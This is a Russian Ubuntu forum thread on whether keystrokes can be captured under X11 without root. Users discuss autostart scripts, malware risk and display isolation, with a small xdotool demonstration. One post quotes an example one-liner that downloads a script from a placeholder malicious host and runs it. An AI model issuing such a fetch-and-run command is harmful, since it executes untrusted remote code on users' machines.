Глобальный перехват клавиатуры без рута возможен?

[agimoura]

Да сдался мне Ваш компьютер...
(Сорри за оффтоп)

Примерно такую тираду я называю "словоблудием"...  И именно благодаря такому словоблудию и подобным теоретическим рассуждениям у новичков остаётся виндовая паранойя о вирусах в линуксе... 
А ключевые слова в вашем последнем топике: "...Только сегодня в поисках виндового драйвера...". Плюс виндовая привычка пользователей всё искать на всяких варезах... 

[buggykey]

Во-первых, давайте без хамства - это форум, а не базар, я Вам на мозоль не наступал (кажется).
А если хотите конкретики - Вы хоть раз вводили рутовый пароль, добавляя в автозапуск в Гноме, или в КДЕ какой-нибудь Скайп, Тандерберд и т. д.?
Выводы?
Так что паранойя - это к психиатру, а не на forum.ubuntu.ru.
А что касается моей привычки искать виндовый софт на варезниках - если Вы попробуете в яндексе набрать слово "киска" (в поисках фото кошачьих), увидите много картинок "сильно не по теме". Так что уж, на что натыкался - о том и говорю.

[agimoura]

...
А если хотите конкретики - .....

Вот-вот! О конкретике я и сказал раньше! Давайте, вместо голых теоретических размышлений и предположений (это можно, это возможно, а это вообще проще простого) проведём маленький практический эксперимент. После которого с полным правом можно сказать:"это возможно сделать, ибо у меня получилось!" 
Или, другими словами: у меня есть пример скрипта, который тем или иным способом можно внедрить в систему соседа, причём сосед об этом ни сном ни духом, и этот скрипт будет отправлять мне те данные, что я захочу (сведения о нажатых клавишах клавиатуры, например)! И никакого рута мне при этом не понадобится! 
Всё остальное — просто голословный трёп, будоражащий мозги новичков. 

[artifactor]

интересная вещь.
в общем, buggykey говорит дело, я об этом тоже говорил ранее. но вот в чём беда: если вы скачиваете бинарник или скрипт через браузер(я для примера возьму оперу, т.к. ей пользуюсь), то по умолчанию запрещён запуск этого файла. если дело обстоит с Windowsким приложением,то в xubuntu убрали разрешение о запуске, т.е. из-под thunar'а я смогу запустить без прав запуска, из терминала - нет.
если скачать архив *.tar.gz, то там могут быть файлы, у которых уже есть права на запуск.
если будет уязвимость в браузере или в джаве, которая сможет создать файл с заранее подготовленным текстом(вроде wget virus.org/supervirus.sh && chmod +x supervirus.sh && ./supervirus.sh), то ещё нужно проверить, будет ли он это запускать. я пробовал прописывать больше одной команды через диспетчер настроек(т.е. там, где всё разрешено), и то невозможно было создать больше одной команды: ничего после && не работало и команда вообще не выполнялась. в итоге пришлось делать отдельный скрипт. если просто прописать команду, даже просто запуск приложения, то оно не будет выполняться. если через sleep - будет.

вот так немного можете успокоиться, но предупреждаю, что на кедах, гноме и юнайти всё может быть иначе.

[staso]

...
А если хотите конкретики - .....

Вот-вот! О конкретике я и сказал раньше! Давайте, вместо голых теоретических размышлений и предположений (это можно, это возможно, а это вообще проще простого) проведём маленький практический эксперимент. После которого с полным правом можно сказать:"это возможно сделать, ибо у меня получилось!" 
Или, другими словами: у меня есть пример скрипта, который тем или иным способом можно внедрить в систему соседа, причём сосед об этом ни сном ни духом, и этот скрипт будет отправлять мне те данные, что я захочу (сведения о нажатых клавишах клавиатуры, например)! И никакого рута мне при этом не понадобится! 
Всё остальное — просто голословный трёп, будоражащий мозги новичков. 

Конкретики. Есть у меня. Почитайте хоть этот форум. Обсуждалось уже как установка звонилки от  ЮСБ модема давала рутовые привилегии всеем на машинке. Вам абсолютно верно говорят - заставить юзера выполнить зловреда  это весьма простая задача.

[ArcFi]

Товарищи, объясняю ещё раз для непонятливых: то, что вы сами запускаете, — это ни фига не глобальный перехват.
Клавиатуру другого аккаунта (в ином DISPLAY) вы таким макаром не перехватите.

[buggykey]

Товарищи, объясняю ещё раз для непонятливых: то, что вы сами запускаете, — это ни фига не глобальный перехват.
Клавиатуру другого аккаунта (в ином DISPLAY) вы таким макаром не перехватите.

Вот с этим спорить не буду.
Я имел ввиду только установку скрипта в автозапуск для конкретного юзера.

[victor00000]

buggykey,

Код: [Выделить]

L~$ DISPLAY=:1.1 xdotool key A
Error: Can't open display: (null)
Failed creating new xdo instance
L~$ DISPLAY=:0.0 xdotool key A
AL~$ A


[Sly_tom_cat]

Собственно тему уже давно обсудили:
Перехват клавиатурных нажатий не требует прав рута - это дыра/фича x-windows.
Но для организации взлома таким образом - нужно внедрится на машину атакуемого.
Внедрение - отдельный вопрос выходящий далеко за рамки данного обсуждения. Кроме того - уж если есть возможность внедрится (запустить на атакуемой машине что-либо даже с правами пользователя) то путей взлома системы - много и кей-логер - не самый скрытый путь.
Посему считаю вопрос закрытым и, дабы не плодить здесь ненужного флейма, тема заблокирована.